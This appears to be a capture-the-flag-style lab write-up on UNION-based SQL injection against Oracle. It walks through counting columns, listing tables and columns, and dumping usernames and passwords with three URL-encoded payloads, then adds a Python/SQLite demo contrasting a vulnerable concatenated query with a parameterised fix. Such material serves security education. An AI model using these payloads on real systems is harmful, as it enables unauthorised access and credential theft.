06 - SQL injection attack, listing the database contents on Oracle
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
Given: Injection point (Product category filter), Attack type (UNION-based)
Find: Table name >> Column names >> username & password
End goal: Log in as the administrator user
Since the injection point is in the product category filter, click on any product category and capture the request in Burp Suite. After capturing the request, the next step is to find the number of columns returned by the original query, because a UNION SELECT is only valid when it returns the same number of columns.
If we try ORDER BY 2, it returns 200 OK:
If we try ORDER BY 3, it returns 500 Internal Server Error:
That means the original query returns only 2 columns.
Now that we know there are 2 columns, we have to extract the name of the table. On Oracle, the all_tables view lists every table the current user can access, so we can inject the following query to list them:
l'+UNION+select+null,table_name+FROM+all_tables--
From the list of all tables we have to find (or guess) the right one. In our case we are looking for a table of users, so the table name USERS_CVMDQF looks relevant for our purpose.
We have the table name, now we have to find its column names. On Oracle, all_tab_columns lists the columns of every accessible table, so we can inject the following query to get them:
l'+UNION+select+null,column_name+FROM+all_tab_columns+WHERE+table_name+%3d+'USERS_CVMDQF'--
In the output, it lists the column names:
Now we have the table name and the column names, so we can craft a query to get the users' passwords. The injected query is the following:
l'+UNION+select+USERNAME_KPUCTB,PASSWORD_NSWUKG+FROM+USERS_CVMDQF--
In the output, it lists the usernames and passwords:
Now log in as the administrator user to solve the lab.
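As an added example (not part of the original write-up or the lab), the bug behind this walkthrough beside its fix: a Python/SQLite stand-in for the category filter, with sqlite_master playing the role of Oracle's all_tables, the write-up's table and column names, and constructed data. The concatenated query leaks the catalogue and the credentials to the same payloads; the parameterised query returns nothing.

```python
import sqlite3

# Constructed stand-in for the lab's catalogue. Oracle is not available offline,
# so SQLite is used; its sqlite_master view plays the role of all_tables here.
# Table and column names are the ones from the write-up; the data is made up.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE PRODUCTS (NAME TEXT, CATEGORY TEXT);
        CREATE TABLE USERS_CVMDQF (USERNAME_KPUCTB TEXT, PASSWORD_NSWUKG TEXT);
        INSERT INTO PRODUCTS VALUES ('Mug', 'Gifts'), ('Pen', 'Gifts');
        INSERT INTO USERS_CVMDQF VALUES ('administrator', 'sample-secret');
    """)
    return con

def filter_vulnerable(con, category):
    # The bug: the category parameter is concatenated into the SQL text, so a
    # single quote closes the literal and the rest of the input becomes SQL.
    sql = "SELECT NAME, CATEGORY FROM PRODUCTS WHERE CATEGORY = '" + category + "'"
    return con.execute(sql).fetchall()

def filter_safe(con, category):
    # The fix: a bound parameter. The input is passed as a value and never
    # parsed as SQL, so the same payloads simply match no category.
    sql = "SELECT NAME, CATEGORY FROM PRODUCTS WHERE CATEGORY = ?"
    return con.execute(sql, (category,)).fetchall()

# The write-up's two payloads, URL-decoded. The two-column UNION matches the
# two columns of the original query, which is why ORDER BY 3 failed in the lab.
LIST_TABLES = "l' UNION SELECT NULL, name FROM sqlite_master--"
DUMP_USERS = "l' UNION SELECT USERNAME_KPUCTB, PASSWORD_NSWUKG FROM USERS_CVMDQF--"

def leaked_tables(rows):
    # UNION rows carry NULL in the first column, which real product rows never do.
    return {name for first, name in rows if first is None}

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, table listing:", sorted(leaked_tables(filter_vulnerable(con, LIST_TABLES))))
    print("vulnerable, credentials:", filter_vulnerable(con, DUMP_USERS))
    print("parameterised, same payload:", filter_safe(con, DUMP_USERS))
```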
Lab Solved: